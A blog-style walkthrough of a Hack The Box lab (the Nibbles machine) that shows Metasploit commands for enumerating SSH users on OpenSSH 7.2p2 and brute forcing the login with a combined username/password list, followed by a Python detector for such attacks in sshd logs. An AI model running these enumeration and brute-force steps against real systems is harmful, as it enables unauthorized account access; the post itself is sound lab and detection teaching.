In this blog post, I will show you how to automate a brute force attack on SSH with the help of Metasploit. The methodology presented here can be used in a penetration test to check whether the credentials of an SSH login are strong enough and, perhaps more importantly, to find out whether the blue team detects our brute force attack.
In order to follow along you need a VIP subscription to Hack The Box (the monthly fee is 12 Euro at the moment), the HTB connection pack (download it from here) and Kali Linux (I’m using version 2020.3).
Create a Connection to the HTB Network
Refer to this post of mine.
Scanning and Enumeration
Open https://www.hackthebox.eu/home/machines and write down Nibbles’s IPv4 address. Here we can also see that this is a Linux machine.
We first scan the target machine in order to identify open ports and services running behind those ports.
Ports 22 (SSH) and 80 (HTTP) are open. In this post I will focus on SSH, even though HTTP is the way in for this machine [1].
Brute force SSH attack
We search Google for “openssh 7.2p2 exploit”. From the results, we learn that users on an OpenSSH server of this version can be enumerated using a malformed packet or a timing attack. The idea here is to enumerate the users on this SSH server and then combine that list with common SSH passwords in order to run an automated brute force SSH attack.
To enumerate the users we will use the auxiliary/scanner/ssh/ssh_enumusers module in Metasploit with unix_users.txt as the user list. Moreover, we will log the output of this module for later processing.
msfconsole
use auxiliary/scanner/ssh/ssh_enumusers
set rhosts 10.10.10.75
set user_file /usr/share/wordlists/metasploit/unix_users.txt
spool /root/Documents/nibbles/ssh_enumusers.log
run
We now extract the usernames from the log file with grep and awk and save the output in ssh-users.txt. The grep drops the "not found" lines, and the awk filter keeps only lines whose sixth field is "User" and strips the surrounding quotes from the username in the seventh field.
grep -v "not" ssh_enumusers.log | awk '{ if ($6 == "User") { print substr($7,2,length($7)-2) } }' > ssh-users.txt
The next step is to download a list of common SSH passwords and combine it with the username list that we already have. We first download this list, which contains 21 passwords (even if the file name says 20). Then we run my shell script (see the screenshot below) to combine each username with each password. Each entry is written on its own line, with the username and password separated by a space.
We then make this script executable with chmod 744 combi-usernames-passwords.sh and run it. The new list, which is saved in users-passwords-ssh.txt, contains 630 credential pairs. Now we will use this list to run Metasploit's auxiliary/scanner/ssh/ssh_login module, which will brute force the SSH login.
msfconsole
use auxiliary/scanner/ssh/ssh_login
set rhosts 10.10.10.75
set stop_on_success true
set verbose true
set userpass_file /root/Documents/nibbles/users-passwords-ssh.txt
run
After some minutes, this module terminates without having found a valid combination. This is fine, as we only used 21 SSH passwords. If this were a pentest, we would expect the blue team to detect our attack, as we made a lot of noise banging on their doors.
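To show what the blue team's side of this looks like, here is an added example (not code from the original post): a small Python detector run over constructed sshd auth.log lines that flags any source IP producing many failed passwords, often for usernames the server does not know, inside a short window, which is the footprint a wordlist-driven ssh_login run leaves behind. The hostname, IPs and usernames in the sample are constructed placeholders, and the threshold and window are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of the syslog-style lines sshd writes to /var/log/auth.log.
# Hostname, IPs and usernames are placeholders, not data from the original post.
SAMPLE_LOG = """\
Jan 10 21:03:01 nibbles sshd[1201]: Failed password for invalid user admin from 10.10.14.2 port 40112 ssh2
Jan 10 21:03:02 nibbles sshd[1203]: Failed password for root from 10.10.14.2 port 40114 ssh2
Jan 10 21:03:02 nibbles sshd[1205]: Failed password for invalid user guest from 10.10.14.2 port 40116 ssh2
Jan 10 21:03:03 nibbles sshd[1207]: Failed password for invalid user backup from 10.10.14.2 port 40118 ssh2
Jan 10 21:03:04 nibbles sshd[1209]: Failed password for root from 10.10.14.2 port 40120 ssh2
Jan 10 21:05:40 nibbles sshd[1250]: Accepted publickey for nibbler from 10.10.14.9 port 51022 ssh2
Jan 10 21:06:10 nibbles sshd[1260]: Failed password for nibbler from 10.10.14.9 port 51030 ssh2
"""

# Matches failed password attempts only; "invalid user" marks a name sshd does not know.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?P<invalid>invalid user )?(?P<user>\S+) from (?P<ip>\S+)"
)

def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {ip: {failures, users, invalid_users}} for each source IP with at least
    `threshold` failed logins inside any sliding window of window_seconds."""
    events = defaultdict(list)  # ip -> [(timestamp, username, is_invalid_user)]
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue  # accepted logins and other sshd messages are not failures
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")  # year-less syslog stamp
        events[m.group("ip")].append((ts, m.group("user"), bool(m.group("invalid"))))
    alerts = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # move the window start forward until it lies within window_seconds of evs[end]
            while (evs[end][0] - evs[start][0]).total_seconds() > window_seconds:
                start += 1
            count = end - start + 1
            if count >= threshold and count > alerts.get(ip, {}).get("failures", 0):
                window = evs[start:end + 1]  # many distinct/unknown users = wordlist run
                alerts[ip] = {"failures": count, "users": sorted({u for _, u, _ in window}),
                              "invalid_users": sum(1 for _, _, inv in window if inv)}
    return alerts

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_LOG))
```

On the sample, only 10.10.14.2 is flagged (five failures across four usernames in three seconds, three of them for unknown users); the single failed password from 10.10.14.9 stays below the threshold.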
I hope you liked this post. If you have any questions, feel free to leave a comment in the comment section. Never stop learning!
[1] If you are stuck, have a look at Heath Adams's solution here: Pentesting for n00bs: Episode 6 – Nibbles